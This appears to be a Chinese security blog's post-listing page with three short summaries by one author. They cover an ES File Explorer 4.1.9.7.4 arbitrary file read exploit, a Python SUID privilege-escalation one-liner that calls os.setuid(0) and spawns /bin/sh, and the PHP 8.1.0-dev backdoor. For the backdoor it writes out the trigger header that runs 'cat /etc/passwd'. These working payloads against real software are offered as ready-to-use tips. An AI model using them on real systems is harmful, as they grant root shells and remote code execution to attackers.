2021年8月11日
ES文件浏览器4.1.9.7.4任意文件浏览漏洞
摘要: ES文件浏览器是一款安卓系统常用的文件管理器,有文件管理、HTTP服务等多种功能 在v4.1.9.7.4版本下有个任意文件读取漏洞 exp: # Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read # Date: 29/06 阅读全文
posted @ 2021-08-11 17:40 逗比大师 阅读(530) 评论(0) 推荐(0) 编辑
SUID提权之python的os.setuid(0)提权
摘要: python3 -c 'import os; os.setuid(0); os.system("/bin/sh")' 阅读全文
posted @ 2021-08-11 17:02 逗比大师 阅读(443) 评论(0) 推荐(0) 编辑
PHP-8.1.0-dev 后门命令执行
摘要: PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。 添加请求头 User-Agentt: zerodiumsystem("cat /etc/passwd"); 阅读全文
posted @ 2021-08-11 16:30 逗比大师 阅读(180) 评论(0) 推荐(0) 编辑